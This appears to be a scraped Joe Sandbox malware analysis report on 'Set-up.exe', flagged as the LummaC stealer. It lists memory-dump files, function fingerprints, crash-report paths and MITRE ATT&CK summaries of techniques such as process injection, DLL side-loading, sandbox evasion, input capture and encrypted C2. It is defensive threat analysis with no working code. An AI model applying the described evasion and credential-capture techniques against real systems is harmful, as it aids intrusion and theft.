Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_testudatalua_getmetatable
String ID: not enough memory for buffer allocation$number has no integer representation
API String ID: 569719852-663388295
Opcode ID: 3fa619fb55fd36d7cc91ad61c22549e1f43b292b52a773f9fd91068dd54b363a
Instruction ID: 07658be90aa175554a4dda0ff9b9f3bf1ebc795eeb7b8b7f97f15d42d79cebf2
Opcode Fuzzy Hash: 3fa619fb55fd36d7cc91ad61c22549e1f43b292b52a773f9fd91068dd54b363a
Instruction Fuzzy Hash: C1D05E3500020DBFCF065F40DC0299A7BAAEF44350F108066FD2806361FB32E920EA91

Function 00A8E5D0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E5ED
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E61F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E636
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E658

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: a000eefa6d3264a98c2b05f513be450c70880cf594f64256d34ed54f9056df7a
Instruction ID: 3e0b11f92a7d78f3dcde41f5f40d1490bdb6a0215723c3f4c08403f434325933
Opcode Fuzzy Hash: a000eefa6d3264a98c2b05f513be450c70880cf594f64256d34ed54f9056df7a
Instruction Fuzzy Hash: 9A11D673500204ABD721AF14EC41B26BB69EFE4710F190164FE181B26AF772F92587D1

Function 00A8E510 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E52D
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E55F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E576
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E598

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e822738a9c7053b94d8772f9aead2d3612dad8c7544383263fe06c7a961a4be3
Instruction ID: 04f336c25e3de7f9b42a3b197dbea1c18be02bab18cdacf808de897a18987e74
Opcode Fuzzy Hash: e822738a9c7053b94d8772f9aead2d3612dad8c7544383263fe06c7a961a4be3
Instruction Fuzzy Hash: ED110373500204BBD721AF04EC41B2ABBA9EFD4724F190164EE181B2AAF772F92587D1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Set-up.exe_4c9c2ad393d0b659aa78fea51f43981ea82cba10_6ae3b109_e4f0c861-ae91-41e5-a571-8f8d191fc96d\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER837C.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8477.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER84A7.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
Set-up.exe

Function 029D0C85 Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Function 029D0B35 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Function 029D0575 Relevance: 1.9, APIs: 1, Instructions: 399
threadCOMMON

Function 02A26C17 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Function 02A25835 Relevance: 1.6, APIs: 1, Instructions: 318
memoryCOMMON

Function 029E31E3 Relevance: 27.8, Strings: 22, Instructions: 337
COMMON